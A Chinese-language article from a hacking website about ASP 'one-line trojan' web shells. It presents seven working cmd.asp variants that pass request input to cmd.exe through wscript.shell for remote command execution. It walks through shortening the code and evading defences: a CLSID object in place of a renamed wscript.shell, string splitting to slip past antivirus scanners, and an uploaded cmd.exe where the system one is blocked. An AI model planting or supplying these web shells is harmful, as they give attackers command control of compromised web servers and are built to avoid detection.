欢迎来到 黑吧安全网 聚焦网络安全前沿资讯,精华内容,交流技术心得!

关于一句话木马

来源:本站整理 作者:不详 时间:2014-04-18 TAG: 我要投稿

这里的asp后门不指像那些一句话木马、砍客、冰狐、明小子之类的b/s型的,只指像cmd.asp或2005a.asp的。
第一个,来看zzzeva免fso的cmd.asp
代码如下:<form method="post">
<input type=text name="cmd" size=60>
<input type=submit value="run"></form>
<textarea readonly cols=80 rows=20>
<%response.write server.createobject("wscript.shell").exec("cmd.exe /c
"&request.form("cmd")).stdout.readall%>
</textarea>
是不是觉得有点长了?在黑客注入时写有点不好写。那来改一下。
第二个,更改zzzeva免fso的cmd.asp
代码如下:

<textarea readonly cols=80 rows=20>
<%response.write server.createobject("wscript.shell").exec("cmd.exe /c
"&request("cmd")).stdout.readall%>

用法是xx.asp?cmd=net user
这样是为了得到结果排得方便,其实如果不为美观,还可以更短,那来第三个
第三个,缩短的cmd.asp

<%response.write server.createobject("wscript.shell").exec("cmd.exe /c
"&request("cmd")).stdout.readall%>


这里用了response.write,变量用了cmd。为什么不更短呢?
第四个,更短的cmd.asp

<%=server.createobject("wscript.shell").exec("cmd.exe /c
"&request("c")).stdout.readall%>

好像这就是最短的了。除了短,我们还要在别的地方下功夫。
第五个,wscript.shell被改名怎么办?
代码:

<ObjEct runat=sErvEr iD=kk scOpE=pagE
classiD="clsiD:72C24DD5-D70A-438B-8A42-98424B88AFB8"></ObjEct>
<%=kk.exec("cmd /c "+request("cmd")).stdout.readall%>

当然,classid值在不同系统下有所不同。这个要自行更改

第六个,被一些杀asp木马的软件检测出来怎么办?
把变量拆开呀。代码:


<%=server.createobject("ws"+"cript.shell").exec("cmd.exe /c
"&request("c")).stdout.readall%>

<%=server.createobject("ws"&"cript.shell").exec("cmd.exe /c
"&request("c")).stdout.readall%>

这里代码引号里的东东都可以随便拆的,像还可以拆成


<%=server.createobject("ws"&"cript.shell").exec("c"&"md.exe /c
"&request("c")).stdout.readall%>


第7个,cmd.exe不让调用怎么办?
这个你自己上传一个cmd.exe,放在一个可以调用的目录下,代码更改如下:

<%=server.createobject("wscript.shell").exec("e:\aspx\cmD.EXE /c
"&request("c")).stdout.readall%>

 
 

【声明】:黑吧安全网(http://www.myhack58.com)登载此文出于传递更多信息之目的,并不代表本站赞同其观点和对其真实性负责,仅适于网络安全技术爱好者学习研究使用,学习中请遵循国家相关法律法规。如有问题请联系我们,联系邮箱admin@myhack58.com,我们会在最短的时间内进行处理。
  • 最新更新
    • 相关阅读
      • 本类热门
        • 最近下载